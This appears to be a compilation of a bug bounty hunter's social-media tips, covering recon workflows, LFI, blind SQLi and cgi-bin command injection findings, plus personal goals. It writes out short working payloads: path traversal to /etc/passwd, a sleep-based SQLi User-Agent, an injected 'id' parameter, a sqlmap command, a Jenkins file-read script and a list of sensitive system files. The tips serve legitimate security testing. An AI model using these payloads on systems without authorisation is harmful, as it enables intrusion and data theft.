#Beginner#recon#bugbountytips#bugbounty
1-Choose a wildscope and enumerate subs using subfinder +amass+ assetfinder + knockpy
2- Now run httpx and pic intresting subdomains only
3- Specially php aspx html asp and old looking websites
4- Now fuzz interesting subs with ffuf
#LFI#P1#bugbountytips#bugbounty
1- Go to admin. site.tld/login
2- Tried to login with wrong credentials > error
3- Send to burp repeater
4- Found new parameter filename because of error
5- tried payload
../../../../../../../../../../../../etc/passwd
6- Full LFI ✅
#P1#sqli#bugbountytips#bugbounty
Application was using php ( whenever I see php , I test sqli first )
I tried blind sqli payload in login params - not worked
sprayed in user-agent - worked✅
User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR"
===> 5.xx seconds delay
#P1#bugbounty#bugbountytips#bugcrowd
1- on visiting url http://domain.tld it were redirecting first to http://domain.tod/dir1/dir2 then to sso login
2- Fuzzed after first redirection
3- http://domain.tld/dir1/dir2/FUZZ
4- this payload leads to 200 ok disclosed local files
If you have access to #jenkins dashboard
use below Script Console cmd for poc
```
def passwdFile = new File("/etc/passwd")
println passwdFile.text
```
#P1#bugbountytips#bugbounty
If you will see below ss
I came back touching local files with 500 error 😅
Payload : ../../../../../../../../../../../../../etc/passwd
weird case not a full #LFI
story of very quick RCE
Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can to add this paths for ur wordlist
cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips ❤️
#New#year#Resolution
This year I decided to help at least 10 BB Hunters( I will choose my own ) to get their 1st bounty on any platform
Learners who r trying hard from 1 or 2years
2 already done - @starkcharry & @TheLittleH4ck3r
💪⚡️
Keep pwning same program:
Found first P1 in jan 2022 and now it’s dec - still finding bugs here
1- url/FUZZ
2- url/web/admin/home
3- Found login
4- Enter [ admin@domain .com :: Admin@1 ]
#bugbountytips#BugBounty
Don’t underestimate the power of /
Just found a P1
domain.tld/FUZZ
domain.tld/dir - no results
domain.tld/dir/ - unauthorised access to a monitoring Panel
#bugbounty
#bbcollab ⚡️
Me & @GodfatherOrwa earned $$ for submission on @bugcrowd#ItTakesACrowd
bug : internal secrets disclose in dumped files
== As always I found the bug and orwa 👑 escalated it
#P1 > report > @RelentlessT7 < 10 min
I can confirm tal_bc doesn't sleep 😅
Bug :: working aws cred were leaking in main.xx.js file
Found this file in view-source
- visited view-source & search '.js'
- validated aws secret with @streaak github repo
github.com/streaak/keyhacks#…
#Recon 🫰
4 SQLi , 2 Blind XSS , 3 Ref XSS on old fav program
plus 1 admin last week ( by full port scan )
I hunt on this program 2 times /month and find bugs every time
Read blog > got new idea > write down in notes > do recon again > hunt with notes
+ #TakeCareOFYourHealth
sqli or not ? #BugBounty
so it was POST /xxx.php HTTP 1.1
with multipart params
> .php 👀should I try sqli ?
> replaced one param with *
> saved as r.txt
cmd - python3 sqlmap.py -r r.txt --level 5 --risk 3 --dbs --time-sec=15 --hostname
will post if succeed
1/n
November goal :
25 bugs / week all platforms combined
30 push ups on each N/A or dup :)
5 P1 or critical atleast
If I lost P1 goal - will give away 5 random winners with subs of their choice ( prettyrecon / htb / pentesterlab )
My goals for 2022
1) Only cert - @Bugcrowd CPT
2) 10X Bounties than last year
3) Hack more rdp's
4) Collaboration with few awesome hackers
5) Do Charity
6) Gift a bike or car to myself
7) Daily 1hr for health .
8) Will share more bugbounty tips :)
#bugbounty#infosec#hacking
few ways to try on #admin
- Default login ( panel based - google )
- Response manipulation
- Admin bruteforce with top 10k passwords
**only if bruteforce is in scope **
- Fuzz for hidden register/signup page then signup as admin (rare)
Thank you everyone for following ❤️
I have 10k friends now ,
Will send 10 gifts🎁to first 10 randomly generated numbers
just comment a number out of 1-10,000 👇
and 11th gift to last follower
#Giveway
Found another weird #P1
PII leakage of 15k users
#tip - fuzz faster you fool aka #ffuf
Started ffuf : 301- django error
ran ffuf again -mc 200 : Critical PII disclosure 💸💸
Local files for Linux :
/etc/passwd
/etc/shadow
/etc/shells
/etc/group
/etc/profile
/etc/hosts
/proc/self/environ
/proc/self/status
/proc/mounts
#bugbountytips#BugBounty
I want to share a small story of life .
From my first P1 to till date , It was @GodfatherOrwa behind my most of P1 successes
I started hunting for P1's after reading his blog .
You are a gifted brother . Many times I found any doubt on bugs , sent to you
always record video poc for high & crits
always record video poc for high & crits
always record video poc for high & crits
always record video poc for high & crits
.
.
else customer may cheat >>>>>>>>>>
Testing multiple targets at a time may or may not lead to good bounties
But sticking with one wide-scope target and testing it at regular intervals will teach you cool things
Hunt> take break> read blogs> make note(sublime) & Hunt again
#bugbounty
Found 25+ different critical bugs on @Hacker0x01
but ended up reporting them in just 4–5 reports.
bcoz I hate writing lengthy reports with all my heart >>